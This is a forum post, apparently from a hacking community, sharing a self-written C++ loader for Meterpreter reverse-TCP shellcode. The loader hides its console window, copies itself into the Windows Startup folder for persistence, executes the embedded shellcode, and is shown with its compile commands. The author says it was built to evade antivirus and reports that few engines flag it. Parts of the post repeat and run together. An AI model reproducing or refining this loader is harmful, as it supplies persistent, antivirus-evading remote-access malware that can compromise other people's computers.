Hi, I thought I should start contributing to this forum because its a sound forum! :lol: :lol: :lol:
I was doing some pentesting in my hacking lab and I came across a problem when using Meterpreter. Automation and persistence, yes I know there are already premade modules for this but they're not very Anti-Virus friendly!
What my overall goal was to create a custom meterpreter payload that would try and connect back to my host an infinite amount of times, copy itself to the "C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" for persistence (Yes I know if a had a meterpreter session on the hacked computer, I could just move the payload myself manually. But that takes to much time!).
So I firstly picked my payload the x86 meterpreter_reverse_tcp and generated the shellcode into a C format and removed the bad chars like '\x00' and '\xFF'.
And then I programmed this PoC custom meterpreter payload. (I've been Learning C++ for a couple of weeks now so my code is not great but it gets the job done!).
https://www.virustotal.com/en/file/8773 ... 488118618/
Only 4 AV's out of 55 and the Anti-Virus I was against in my lab was avast!
I ran my custom payload on the Windows machine in my lab as admin, and escalated to NT system and no Anti-Virus flagging or Behavioural flagging came up!
Thanks for reading mate. :)
I was doing some pentesting in my hacking lab and I came across a problem when using Meterpreter. Automation and persistence, yes I know there are already premade modules for this but they're not very Anti-Virus friendly!
What my overall goal was to create a custom meterpreter payload that would try and connect back to my host an infinite amount of times, copy itself to the "C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" for persistence (Yes I know if a had a meterpreter session on the hacked computer, I could just move the payload myself manually. But that takes to much time!).
So I firstly picked my payload the x86 meterpreter_reverse_tcp and generated the shellcode into a C format and removed the bad chars like '\x00' and '\xFF'.
And then I programmed this PoC custom meterpreter payload. (I've been Learning C++ for a couple of weeks now so my code is not great but it gets the job done!).
Code: Select all
And thats my payload, I compiled my source code using GCC and the following flags.
#include <iostream>
#include "windows.h"
using namespace std;
unsigned char buf[] =
"\x89\xe0\xd9\xed\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" etc.. etc..
// Meterpreter generated shellcode with bad chars removed.
// http://stackoverflow.com/questions/622592/win32-programming-hiding-console-window#622666
void HideConsoleWindow()
{
HWND HideConsoleWindow;
AllocConsole();
HideConsoleWindow = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(HideConsoleWindow,0);
}
// char** argv points to the location of the executable being run.
int main(int argc, char** argv)
{
HideConsoleWindow();
// Copy file to Windows start up.
CopyFile(argv[0], "C:\\Users\\username\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\copied_payload.exe", 0);
// Declare pointer on function.
int (*func) ();
// Cast shellcode into function.
func = (int (*) ()) buf;
// Call function (Execute shellcode).
(int) (*func) ();
return 0;
}
Code: Select all
And it worked like a charm! I also thought I'd give it an Anti-Virus scan because I was thinking the CopyFile to start up would surely flag?mingw32-g++.exe -Wall -O2 -fomit-frame-pointer -fexpensive-optimizations -Os -m32 -c "C:\Users\user\Documents\Code blocks\Meterpreter\main.cpp" -o obj\Release\main.o
mingw32-g++.exe -o bin\Release\Meterpreter.exe obj\Release\main.o -s -s -m32 -static-libgcc -static-libstdc++
https://www.virustotal.com/en/file/8773 ... 488118618/
Only 4 AV's out of 55 and the Anti-Virus I was against in my lab was avast!
I ran my custom payload on the Windows machine in my lab as admin, and escalated to NT system and no Anti-Virus flagging or Behavioural flagging came up!
Thanks for reading mate. :)
